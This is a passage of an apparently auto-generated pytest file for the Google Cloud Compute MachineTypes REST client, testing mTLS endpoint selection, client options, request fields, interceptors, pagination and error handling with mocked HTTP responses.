patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(MachineTypesClient, transports.MachineTypesRestTransport, "rest", "true"),
(MachineTypesClient, transports.MachineTypesRestTransport, "rest", "false"),
],
)
@mock.patch.object(
MachineTypesClient, "DEFAULT_ENDPOINT", modify_default_endpoint(MachineTypesClient)
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_machine_types_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class", [MachineTypesClient])
@mock.patch.object(
MachineTypesClient, "DEFAULT_ENDPOINT", modify_default_endpoint(MachineTypesClient)
)
def test_machine_types_client_get_mtls_endpoint_and_cert_source(client_class):
mock_client_cert_source = mock.Mock()
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "true".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source == mock_client_cert_source
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "false".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "false"}):
mock_client_cert_source = mock.Mock()
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert doesn't exist.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert exists.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=mock_client_cert_source,
):
(
api_endpoint,
cert_source,
) = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source == mock_client_cert_source
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(MachineTypesClient, transports.MachineTypesRestTransport, "rest"),],
)
def test_machine_types_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[(MachineTypesClient, transports.MachineTypesRestTransport, "rest", None),],
)
def test_machine_types_client_client_options_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"request_type", [compute.AggregatedListMachineTypesRequest, dict,]
)
def test_aggregated_list_rest(request_type):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.MachineTypeAggregatedList(
id="id_value",
kind="kind_value",
next_page_token="next_page_token_value",
self_link="self_link_value",
unreachables=["unreachables_value"],
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineTypeAggregatedList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.aggregated_list(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.AggregatedListPager)
assert response.id == "id_value"
assert response.kind == "kind_value"
assert response.next_page_token == "next_page_token_value"
assert response.self_link == "self_link_value"
assert response.unreachables == ["unreachables_value"]
def test_aggregated_list_rest_required_fields(
request_type=compute.AggregatedListMachineTypesRequest,
):
transport_class = transports.MachineTypesRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).aggregated_list._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).aggregated_list._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(
(
"filter",
"include_all_scopes",
"max_results",
"order_by",
"page_token",
"return_partial_success",
)
)
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.MachineTypeAggregatedList()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "get",
"query_params": request_init,
}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineTypeAggregatedList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.aggregated_list(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_aggregated_list_rest_unset_required_fields():
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.aggregated_list._get_unset_required_fields({})
assert set(unset_fields) == (
set(
(
"filter",
"includeAllScopes",
"maxResults",
"orderBy",
"pageToken",
"returnPartialSuccess",
)
)
& set(("project",))
)
@pytest.mark.parametrize("null_interceptor", [True, False])
def test_aggregated_list_rest_interceptors(null_interceptor):
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
interceptor=None
if null_interceptor
else transports.MachineTypesRestInterceptor(),
)
client = MachineTypesClient(transport=transport)
with mock.patch.object(
type(client.transport._session), "request"
) as req, mock.patch.object(
path_template, "transcode"
) as transcode, mock.patch.object(
transports.MachineTypesRestInterceptor, "post_aggregated_list"
) as post, mock.patch.object(
transports.MachineTypesRestInterceptor, "pre_aggregated_list"
) as pre:
pre.assert_not_called()
post.assert_not_called()
transcode.return_value = {
"method": "post",
"uri": "my_uri",
"body": None,
"query_params": {},
}
req.return_value = Response()
req.return_value.status_code = 200
req.return_value.request = PreparedRequest()
req.return_value._content = compute.MachineTypeAggregatedList.to_json(
compute.MachineTypeAggregatedList()
)
request = compute.AggregatedListMachineTypesRequest()
metadata = [
("key", "val"),
("cephalopod", "squid"),
]
pre.return_value = request, metadata
post.return_value = compute.MachineTypeAggregatedList
client.aggregated_list(
request, metadata=[("key", "val"), ("cephalopod", "squid"),]
)
pre.assert_called_once()
post.assert_called_once()
def test_aggregated_list_rest_bad_request(
transport: str = "rest", request_type=compute.AggregatedListMachineTypesRequest
):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.aggregated_list(request)
def test_aggregated_list_rest_flattened():
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.MachineTypeAggregatedList()
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(project="project_value",)
mock_args.update(sample_request)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineTypeAggregatedList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
client.aggregated_list(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"%s/compute/v1/projects/{project}/aggregated/machineTypes"
% client.transport._host,
args[1],
)
def test_aggregated_list_rest_flattened_error(transport: str = "rest"):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.aggregated_list(
compute.AggregatedListMachineTypesRequest(), project="project_value",
)
def test_aggregated_list_rest_pager(transport: str = "rest"):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.MachineTypeAggregatedList(
items={
"a": compute.MachineTypesScopedList(),
"b": compute.MachineTypesScopedList(),
"c": compute.MachineTypesScopedList(),
},
next_page_token="abc",
),
compute.MachineTypeAggregatedList(items={}, next_page_token="def",),
compute.MachineTypeAggregatedList(
items={"g": compute.MachineTypesScopedList(),}, next_page_token="ghi",
),
compute.MachineTypeAggregatedList(
items={
"h": compute.MachineTypesScopedList(),
"i": compute.MachineTypesScopedList(),
},
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(compute.MachineTypeAggregatedList.to_json(x) for x in response)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {"project": "sample1"}
pager = client.aggregated_list(request=sample_request)
assert isinstance(pager.get("a"), compute.MachineTypesScopedList)
assert pager.get("h") is None
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, tuple) for i in results)
for result in results:
assert isinstance(result, tuple)
assert tuple(type(t) for t in result) == (
str,
compute.MachineTypesScopedList,
)
assert pager.get("a") is None
assert isinstance(pager.get("h"), compute.MachineTypesScopedList)
pages = list(client.aggregated_list(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize("request_type", [compute.GetMachineTypeRequest, dict,])
def test_get_rest(request_type):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "zone": "sample2", "machine_type": "sample3"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.MachineType(
creation_timestamp="creation_timestamp_value",
description="description_value",
guest_cpus=1090,
id=205,
image_space_gb=1430,
is_shared_cpu=True,
kind="kind_value",
maximum_persistent_disks=2603,
maximum_persistent_disks_size_gb=3437,
memory_mb=967,
name="name_value",
self_link="self_link_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineType.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.MachineType)
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.guest_cpus == 1090
assert response.id == 205
assert response.image_space_gb == 1430
assert response.is_shared_cpu is True
assert response.kind == "kind_value"
assert response.maximum_persistent_disks == 2603
assert response.maximum_persistent_disks_size_gb == 3437
assert response.memory_mb == 967
assert response.name == "name_value"
assert response.self_link == "self_link_value"
assert response.zone == "zone_value"
def test_get_rest_required_fields(request_type=compute.GetMachineTypeRequest):
transport_class = transports.MachineTypesRestTransport
request_init = {}
request_init["machine_type"] = ""
request_init["project"] = ""
request_init["zone"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).get._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["machineType"] = "machine_type_value"
jsonified_request["project"] = "project_value"
jsonified_request["zone"] = "zone_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).get._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "machineType" in jsonified_request
assert jsonified_request["machineType"] == "machine_type_value"
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
assert "zone" in jsonified_request
assert jsonified_request["zone"] == "zone_value"
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.MachineType()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "get",
"query_params": request_init,
}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineType.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_get_rest_unset_required_fields():
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.get._get_unset_required_fields({})
assert set(unset_fields) == (set(()) & set(("machineType", "project", "zone",)))
@pytest.mark.parametrize("null_interceptor", [True, False])
def test_get_rest_interceptors(null_interceptor):
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
interceptor=None
if null_interceptor
else transports.MachineTypesRestInterceptor(),
)
client = MachineTypesClient(transport=transport)
with mock.patch.object(
type(client.transport._session), "request"
) as req, mock.patch.object(
path_template, "transcode"
) as transcode, mock.patch.object(
transports.MachineTypesRestInterceptor, "post_get"
) as post, mock.patch.object(
transports.MachineTypesRestInterceptor, "pre_get"
) as pre:
pre.assert_not_called()
post.assert_not_called()
transcode.return_value = {
"method": "post",
"uri": "my_uri",
"body": None,
"query_params": {},
}
req.return_value = Response()
req.return_value.status_code = 200
req.return_value.request = PreparedRequest()
req.return_value._content = compute.MachineType.to_json(compute.MachineType())
request = compute.GetMachineTypeRequest()
metadata = [
("key", "val"),
("cephalopod", "squid"),
]
pre.return_value = request, metadata
post.return_value = compute.MachineType
client.get(request, metadata=[("key", "val"), ("cephalopod", "squid"),])
pre.assert_called_once()
post.assert_called_once()
def test_get_rest_bad_request(
transport: str = "rest", request_type=compute.GetMachineTypeRequest
):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "zone": "sample2", "machine_type": "sample3"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.get(request)
def test_get_rest_flattened():
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.MachineType()
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"zone": "sample2",
"machine_type": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
zone="zone_value",
machine_type="machine_type_value",
)
mock_args.update(sample_request)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineType.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
client.get(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"%s/compute/v1/projects/{project}/zones/{zone}/machineTypes/{machine_type}"
% client.transport._host,
args[1],
)
def test_get_rest_flattened_error(transport: str = "rest"):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get(
compute.GetMachineTypeRequest(),
project="project_value",
zone="zone_value",
machine_type="machine_type_value",
)
def test_get_rest_error():
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
@pytest.mark.parametrize("request_type", [compute.ListMachineTypesRequest, dict,])
def test_list_rest(request_type):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "zone": "sample2"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.MachineTypeList(
id="id_value",
kind="kind_value",
next_page_token="next_page_token_value",
self_link="self_link_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineTypeList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListPager)
assert response.id == "id_value"
assert response.kind == "kind_value"
assert response.next_page_token == "next_page_token_value"
assert response.self_link == "self_link_value"
def test_list_rest_required_fields(request_type=compute.ListMachineTypesRequest):
transport_class = transports.MachineTypesRestTransport
request_init = {}
request_init["project"] = ""
request_init["zone"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).list._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
jsonified_request["zone"] = "zone_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).list._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(
("filter", "max_results", "order_by", "page_token", "return_partial_success",)
)
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
assert "zone" in jsonified_request
assert jsonified_request["zone"] == "zone_value"
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.MachineTypeList()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "get",
"query_params": request_init,
}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineTypeList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_list_rest_unset_required_fields():
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.list._get_unset_required_fields({})
assert set(unset_fields) == (
set(("filter", "maxResults", "orderBy", "pageToken", "returnPartialSuccess",))
& set(("project", "zone",))
)
@pytest.mark.parametrize("null_interceptor", [True, False])
def test_list_rest_interceptors(null_interceptor):
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
interceptor=None
if null_interceptor
else transports.MachineTypesRestInterceptor(),
)
client = MachineTypesClient(transport=transport)
with mock.patch.object(
type(client.transport._session), "request"
) as req, mock.patch.object(
path_template, "transcode"
) as transcode, mock.patch.object(
transports.MachineTypesRestInterceptor, "post_list"
) as post, mock.patch.object(
transports.MachineTypesRestInterceptor, "pre_list"
) as pre:
pre.assert_not_called()
post.assert_not_called()
transcode.return_value = {
"method": "post",
"uri": "my_uri",
"body": None,
"query_params": {},
}
req.return_value = Response()
req.return_value.status_code = 200
req.return_value.request = PreparedRequest()
req.return_value._content = compute.MachineTypeList.to_json(
compute.MachineTypeList()
)
request = compute.ListMachineTypesRequest()
metadata = [
("key", "val"),
("cephalopod", "squid"),
]
pre.return_value = request, metadata
post.return_value = compute.MachineTypeList
client.list(request, metadata=[("key", "val"), ("cephalopod", "squid"),])
pre.assert_called_once()
post.assert_called_once()
def test_list_rest_bad_request(
transport: str = "rest", request_type=compute.ListMachineTypesRequest
):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "zone": "sample2"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.list(request)
def test_list_rest_flattened():
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.MachineTypeList()
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1", "zone": "sample2"}
# get truthy value for each flattened field
mock_args = dict(project="project_value", zone="zone_value",)
mock_args.update(sample_request)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineTypeList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
client.list(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"%s/compute/v1/projects/{project}/zones/{zone}/machineTypes"
% client.transport._host,
args[1],
)
def test_list_rest_flattened_error(transport: str = "rest"):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list(
compute.ListMachineTypesRequest(),
project="project_value",
zone="zone_value",
)
def test_list_rest_pager(transport: str = "rest"):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.MachineTypeList(
items=[
compute.MachineType(),
compute.MachineType(),
compute.MachineType(),
],
next_page_token="abc",
),
compute.MachineTypeList(items=[], next_page_token="def",),
compute.MachineTypeList(
items=[compute.MachineType(),], next_page_token="ghi",
),
compute.MachineTypeList(
items=[compute.MachineType(), compute.MachineType(),],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(compute.MachineTypeList.to_json(x) for x in response)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {"project": "sample1", "zone": "sample2"}
pager = client.list(request=sample_request)
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.MachineType) for i in results)
pages = list(client.list(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = MachineTypesClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide an api_key and a transport instance.
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
options = client_options.ClientOptions()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = MachineTypesClient(client_options=options, transport=transport,)
# It is an error to provide an api_key and a credential.
options = mock.Mock()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = MachineTypesClient(
client_options=options, credentials=ga_credentials.AnonymousCredentials()
)
# It is an error to provide scopes and a transport instance.
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = MachineTypesClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
